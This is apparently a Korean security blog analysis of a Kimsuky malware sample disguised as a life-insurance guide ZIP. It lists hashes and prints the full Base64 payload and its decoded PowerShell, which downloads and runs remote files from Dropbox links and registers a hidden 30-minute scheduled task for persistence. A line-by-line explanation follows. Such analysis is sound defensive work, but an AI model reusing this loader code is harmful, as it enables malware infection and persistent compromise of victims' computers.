김수키(Kimsuky) 에서 만든 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5)

오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5)에 대해 글을 적어보겠습니다.일단 일단 PDF 파일인 것처럼 돼 있지만, 사실은 PDF 파일이 아닌 그냥 링크 파일 아니다. 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:종신안내장v02_곽X환d.zip
사이즈:6,427 Bytes
MD5:40837012253331958723dda63fdfabff
SHA-256:079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34

악성코드에 포함된 Base64 코드

Base64 인코딩

JGhoaCA9IEpvaW4tUGF0aCAoW1N(5)c3Rl(b)S5JTy5QYXRoXTo6R2V0VGVtcFBh(d)GgoKSkgIuyiheyLoOyViOu
CtOyepVYwMl/qs73shLHtmZhELnBkZi5wZGYiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmNv(b)S9zY2wvZmkvbGM3ajdiZTN2dGQyZj(N)oYWR2MGJ6L1YwMl8tRC5wZGYucGRmP3Jsa2V5PXduYWg5ZWR
mMzl2djh2YTdndm1vZHltY2gmc3Q9NjRsaXpyNmsmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaG(h)oOyAkcHBwID
0gSm9pbi1QYXRo(I)CgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoI
CgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaH(R)0cHM6Ly9kbC5kcm9wYm94dX(N)lcmNvbn
RlbnQuY29tL3NjbC9maS9nczU4dTZxdnZ4b3J6dHR2MDl5dnQva3hzeGh4LXgudHh0P3Jsa2V5PXY4NnBkN2kybmp
tN3UwcGZ1dGwwa251Njgmc3Q9Z2p(2)ZGN3OHImZGw9MCIgLU91dEZp(b)GUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtS
XRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHwgT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFV
URjg(7)ICRhY3Rpb24gPSBOZXctU2(N)oZWR1bGVkVGFza0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnI
C1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wICAtTm9uSW50ZXJhY3RpdmU(g)LU5vUHJvZmlsZSA
tRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGFiYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEY
XRhKSBcImNocm9tZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWd(n)ZXIgPSBOZXctU2NoZWR(1)bGVkVGFza1RyaWd
nZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZ
VNwYW4gLU1pbnV0ZXMgMzApOyA(k)c2V0dGluZ3MgPSBOZ(X)ctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRk
ZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJDaHJvbWVVcGRhdGVUYXNrTWFjaGluZSIgLUFjdGl
(v)biAkYWN0aW9uIC1(U)cmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYX
RoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpIC(J)odHRwczovL2RsLmR(y)b3Bib
3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3N1bWNoOG8xMmE0a283d3FxdHJnby9reHN4aHgtZi50eHQ/cmxrZXk9aTh5
dG81eGczdW5mZnM5d2F3aHl0dTF2NCZzdD1yZW(s)5ZGdjbCZkbD0wI(i)AtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJ
lbW92ZS1JdGVtIC1QYXRo
ICRhYWEgLUZvcmNlOw==

Base64 디코딩

$hhh = Join-Path ([System(.)IO(.)Path]::GetTempP(at)h()) "종신안
내장V02_곽x환D(.)pdf(.)pdf"; wget -Uri "hxxps://dl(.)dropboxuser
content(.)com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D(.)pdf.pdf?rlkey
=wnah9edf39vv8va7gvmo9d)ymch&st=64lizr6k&dl=(0)" -OutFile $hhh; & 
$hhh; $ppp = J(o)in-Path ($env:AppData) "chrome(.)ps1"; $str = '$aa
a = Joi(n)-Path ($env:AppData) "temp(.)ps1"; wget -Uri "hxxps://dl(.)dropbox
usercontent(.)com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x(.)txt?rlkey=v86pd7i2(n)jm7
0pfutl0knu68&st=gjvdcw8r&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force
;'; $str | Out-File -FilePa(t)h $ppp -Encoding UTF8; $ac(t)ion = New-Sche(d)uled
TaskAction -Execute 'PowerShell(.)exe' -Argument '-WindowStyle Hid(d)en -nop  -N
onIntera(c)tive -NoProfile -Executi(o)nPolicy Bypass -Comman(d) "& {$abc = Join(-)Pa
th ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-Scheduled(T)askTrigger
-Once -At (Get-Date).A(d)dMinutes(5) -RepetitionInterval (New-TimeSpan -Minut(e)s 30)
; $settings = New-ScheduledTas(k)SettingsSet -Hidden; Register-(S)cheduledTask -TaskN
ame "ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigger -Settings $settings
;  $aaa = Join-Path ($env:AppData) "system_first(.)ps1"; wget -Uri "hxxps://dl(.)drop
boxusercontent(.)com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f(.)txt?rlkey=i8yto5xg3unffs
9wawhytu1v4&st=rek9dgcl&dl=0" -OutFile $aaa; &
$aaa; Remove-Item -Path $aaa -Force;

CyberChef 로 베이스64 풀기

코드 분석

1.Join-Path ([System(.)IO(.)P(a)th]::G(e)tTempPath()) 종신안내장V02_곽x환D(.)pdf(.)pdf  
임시 폴더(Temp)에 종신안내장V02_곽X환D(.)pdf(.)pdf 파일을 저장할 경로를 설정 
Dropbox에서 V02_-D.pdf.pdf 라는 파일을 다운로드 해서 Temp 폴더에 저장
방금전 다운로드한 파일을 실행
2.AppData 폴더(사용자 데이터 폴더)에 chrome(.)ps1라는 악성 스크립트를 저장할 경로 선택
$str 변수에 다음 내용을 저장
temp.ps1이라는 파일을 Dropbox에서 다운로드
다운로드된 temp.ps1을 실행 을 하면 실행 후 즉시 삭제
chrome.ps1 파일에 저장
3.PowerShell을 숨김 모드(-WindowStyle Hidden)로 실행
chrome(.)ps1을 실행하는 명령어 포함 
New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30)  
5분 후 처음 실행하면 악성코드는 30분마다 반복 실행을 하게 돼 있음
작업 스케줄러에 ChromeUpdateTaskMachine이라는 이름으로 등록
즉 컴퓨터를 재부팅을 해도 계속 실행을 하데 돼 있음
system_first.ps1을 Dropbox에서 다운로드 후 실행하고 삭제
해당 파일을 실행했을 때 이미 드롭박스는 폭파가 되었기 때문에 해당 파일을 확인할 수가 없어 더는 분석 불가입니다.
아무튼, 해당 제목만 보면 개인 컴퓨터 또는 노트북을 털어서 악성코드를 만든 것이 아닐까 생각이 됩니다.